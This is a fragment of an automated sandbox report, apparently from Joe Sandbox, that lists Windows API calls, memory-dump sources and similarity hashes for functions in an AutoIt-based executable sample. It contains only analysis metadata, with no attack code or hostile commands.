                                                                                        • GetClientRect.USER32(?,?), ref: 00F5E69A
                                                                                        • GetCursorPos.USER32(?), ref: 00F5E6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F5E6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: b46cb12b57ba9b49d9b564cf0402779f06b1ad3247345fa9c8d0bc608569b9bd
                                                                                        • Instruction ID: c53cb9fc2837b2aa5db4f836b2ec63c268069e542398726b2b4adff41141d861
                                                                                        • Opcode Fuzzy Hash: b46cb12b57ba9b49d9b564cf0402779f06b1ad3247345fa9c8d0bc608569b9bd
                                                                                        • Instruction Fuzzy Hash: BD113371A0002EBBCF14DF98CC858FE7BB9EB09305F010451EA52E7140E778AA95EBA1
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F27352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00F27385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F2739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F273A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: f6ac5234559a3a226afa0843432748e3f4d619712489a3c1674c0a5e7a97a6e0
                                                                                        • Instruction ID: 9402690c1574d286fcd10d0ba5e545cc40fa758a551cea6dfdcb68ad8e9e835a
                                                                                        • Opcode Fuzzy Hash: f6ac5234559a3a226afa0843432748e3f4d619712489a3c1674c0a5e7a97a6e0
                                                                                        • Instruction Fuzzy Hash: 7111C8B2E04218AFD701DB68EC05B9E7BED9B45320F144355F925D3291D6B08D14B7B1
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 3358e9ac0d75ab7c9f4508a2510102d1ab37e1e4b86991a742f164146a2ea980
                                                                                        • Instruction ID: 54f5e5639e73e8f192ac70a934efdc39794c5eaa9a13cfe9a266b864421e7cb3
                                                                                        • Opcode Fuzzy Hash: 3358e9ac0d75ab7c9f4508a2510102d1ab37e1e4b86991a742f164146a2ea980
                                                                                        • Instruction Fuzzy Hash: 73118EB260650DBFEB014F909C50EEA7F6EFF09368F041111FB14A2150C7729D60ABA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 25f9a8b69b9e231b81ccc92924f455ab5e6dd7bdf94945b3b5da4b896ecf87dc
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: B7014B3640014AFBCF125F84DC128EE3F23BB98765B588555FA2859031D336EAB1BB85
                                                                                        APIs
                                                                                          • Part of subcall function 00F07A0D: __getptd_noexit.LIBCMT ref: 00F07A0E
                                                                                        • __lock.LIBCMT ref: 00F0748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00F074AC
                                                                                        • _free.LIBCMT ref: 00F074BF
                                                                                        • InterlockedIncrement.KERNEL32(01022DD0), ref: 00F074D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: 78c228dc07ba0dc99a4ef07959783c41473420b71f52ede2a3aa5cf0daf02b0b
                                                                                        • Instruction ID: e68ea5454ed2371b4fe644a4e160742f38c46698c189b686a767cff3e2939fb6
                                                                                        • Opcode Fuzzy Hash: 78c228dc07ba0dc99a4ef07959783c41473420b71f52ede2a3aa5cf0daf02b0b
                                                                                        • Instruction Fuzzy Hash: 8F01AD36E09725EBDB22FF64980A75DBB60BB04720F154086F814A76D0CB287910FFC2
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F4DFF7
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4E00F
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4E033
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F4E04E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: 213e5bb974b7169d6159e88e173bb5bfbb4f83d5222a26374f731cfd2ef24769
                                                                                        • Instruction ID: 8b99d07aad9be46bbbd2dabc22fd4e333d758a78cc407cd8c5129bdab25c52fe
                                                                                        • Opcode Fuzzy Hash: 213e5bb974b7169d6159e88e173bb5bfbb4f83d5222a26374f731cfd2ef24769
                                                                                        • Instruction Fuzzy Hash: AC114FB9D0020DAFDB01CF98C8849EEBBF9FB08310F108166E925E3210D775AA54DF50
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00F07AD8
                                                                                          • Part of subcall function 00F07CF4: __mtinitlocknum.LIBCMT ref: 00F07D06
                                                                                          • Part of subcall function 00F07CF4: EnterCriticalSection.KERNEL32(00000000,?,00F07ADD,0000000D), ref: 00F07D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00F07AE5
                                                                                        • __lock.LIBCMT ref: 00F07AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 00F07B17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1687444384-0
                                                                                        • Opcode ID: fc2ac3f797ca74dc64444b86a8cd4f5eefb4a10bf1cd631e93ef915488577e29
                                                                                        • Instruction ID: b7de26ccfb1ac1b5f072b14f941167eb0d1cdbf640fc2f036607af2ed4f52c99
                                                                                        • Opcode Fuzzy Hash: fc2ac3f797ca74dc64444b86a8cd4f5eefb4a10bf1cd631e93ef915488577e29
                                                                                        • Instruction Fuzzy Hash: D2015E719047409EE720AF65C90574AB7E0AF80325F20894EE499962E1CB74A640FB41
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F4E33D
                                                                                        • _memset.LIBCMT ref: 00F4E34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FA3D00,00FA3D44), ref: 00F4E37B
                                                                                        • CloseHandle.KERNEL32 ref: 00F4E38D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: 57fd3040a004bd7d6e19ede84576bff609e848587a2b97225f3feb124f867695
                                                                                        • Instruction ID: 13b6cfcd3ccacb0d2905cab6503ea8e487097ee8bafa549f3a3be7f8d62fb806
                                                                                        • Opcode Fuzzy Hash: 57fd3040a004bd7d6e19ede84576bff609e848587a2b97225f3feb124f867695
                                                                                        • Instruction Fuzzy Hash: 5FF05EF164030CFAE7101B60AC46F77BE5CDB06B54F014421FE0AD61A2D7759E00B6B8
                                                                                        APIs
                                                                                          • Part of subcall function 00EFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                          • Part of subcall function 00EFAF83: BeginPath.GDI32(?), ref: 00EFB009
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F4EA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00F4EA9B
                                                                                        • EndPath.GDI32(00000000), ref: 00F4EAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 00F4EAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: e4f62f235313724743fbafbd9ee5f1eb4a93e283420fe9b7ca7eed4f2a28d699
                                                                                        • Instruction ID: 2b57885635d674216e09f686382ba343d28ebcfdda9e630dc30d976c921fbdfd
                                                                                        • Opcode Fuzzy Hash: e4f62f235313724743fbafbd9ee5f1eb4a93e283420fe9b7ca7eed4f2a28d699
                                                                                        • Instruction Fuzzy Hash: 39F0BE3250525CBBDB129F94AC09FCA3F19AF0A320F084201FE21650E1C3B85611EB95
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F1C84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1C85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F1C864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00F1C86B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 8e923e2f6e992eedf450557c1258887662c0892f732c76fd2ef9f14909c1921d
                                                                                        • Instruction ID: c2a76afdf18324d0bf4db3f8124107e72e55ad1a77ff308303764a1dc466fd91
                                                                                        • Opcode Fuzzy Hash: 8e923e2f6e992eedf450557c1258887662c0892f732c76fd2ef9f14909c1921d
                                                                                        • Instruction Fuzzy Hash: 88E03971A81228BAEB201BA2DC4DEDB7F1CEF067B1F008021F61984460C6B28580EBE0
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00F1B0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F1AC9D), ref: 00F1B0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F1AC9D), ref: 00F1B0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F1AC9D), ref: 00F1B0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: 315da61e720cc6bd80fa3d08cc1e115be81e5c730aa5f7dd598628bd107c3283
                                                                                        • Instruction ID: 6e305a75356bb38c96e0d3b9227ce199f836968447f985b11b3c2c209c9e80f4
                                                                                        • Opcode Fuzzy Hash: 315da61e720cc6bd80fa3d08cc1e115be81e5c730aa5f7dd598628bd107c3283
                                                                                        • Instruction Fuzzy Hash: 4FE08632F01216EBD7201FB25C0DB873BA8EF597A2F018818F261D6040DBB48441E760
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00EFB496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00EFB4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00EFB4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00EFB4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00F5DE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F5DE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00F5DE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00F5DE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00F5DE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5DE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 010ae5055badd8f1473f8c13e8460c6b64b0afd31d854c1a4bf0a0299d722b4c
                                                                                        • Instruction ID: b4cb06fdfad0df2ceeb6e65039e38081ec6287fe3a6335bab8ae3742d77fea42
                                                                                        • Opcode Fuzzy Hash: 010ae5055badd8f1473f8c13e8460c6b64b0afd31d854c1a4bf0a0299d722b4c
                                                                                        • Instruction Fuzzy Hash: 9EE0E531A00244ABEF215B64EC0DBD83B119B52336F14C666FB75580E1C7F14585EB11
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F1B2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00F1B2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1B2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1B2FC
                                                                                          • Part of subcall function 00F1AB24: GetProcessHeap.KERNEL32(00000000,?,00F1A848), ref: 00F1AB2B
                                                                                          • Part of subcall function 00F1AB24: HeapFree.KERNEL32(00000000), ref: 00F1AB32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: efac6a33b7a546aca6de6070de840c59702a6f8e3f09013a9af8f4be40972743
                                                                                        • Instruction ID: d688c21fcc8206ed25cb5b0201997c567f5f703c316ae60c9854fe5fbd136174
                                                                                        • Opcode Fuzzy Hash: efac6a33b7a546aca6de6070de840c59702a6f8e3f09013a9af8f4be40972743
                                                                                        • Instruction Fuzzy Hash: 3DE0EC3A604009BFCB016FA5EC09859FFB6FF883213108222F63581675CB76A871FB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 5d0013dc9a1cd14ef31d6ebd37b1e6b32b0cfb223f92bfa25021d28484c9c074
                                                                                        • Instruction ID: 558853368621790c4ea6f9e338c52e08d5e0b5e3e1e241edcff90d2c2edcb931
                                                                                        • Opcode Fuzzy Hash: 5d0013dc9a1cd14ef31d6ebd37b1e6b32b0cfb223f92bfa25021d28484c9c074
                                                                                        • Instruction Fuzzy Hash: 80E04FB1A00208EFDB015F70CC4C66D7BA9EB4C351F11C809FE6A97250DBF59840AF50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 68fcf71a25c2aeb06a87c60ecb05f21d2cbe49c9abe39d0bfb47bf852a659785
                                                                                        • Instruction ID: 2ffcd7b40ac0bf3e6a2918f153f261f2d8033db74d840ead7b9321b22361d6e3
                                                                                        • Opcode Fuzzy Hash: 68fcf71a25c2aeb06a87c60ecb05f21d2cbe49c9abe39d0bfb47bf852a659785
                                                                                        • Instruction Fuzzy Hash: 31E04FB1A00208EFDB005F70CC4856D7BA9EB4C350F118409FA6A97250DBF59800AB10
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00F1DEAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 7465b852ec7d4433464e03e083956027167e1d42359c2439be4c4fc46f40e3b1
                                                                                        • Instruction ID: 54f903f2833ce215e874f92e4a63ea3989036796b61a489f4a0f7286820837bb
                                                                                        • Opcode Fuzzy Hash: 7465b852ec7d4433464e03e083956027167e1d42359c2439be4c4fc46f40e3b1
                                                                                        • Instruction Fuzzy Hash: D0914770600701AFDB54DF64C884BAABBF9BF48710F10856DF94ACB291DB71E981DB60
                                                                                        APIs
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • __wcsnicmp.LIBCMT ref: 00F2DEFD
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F2DFC6
                                                                                        Strings
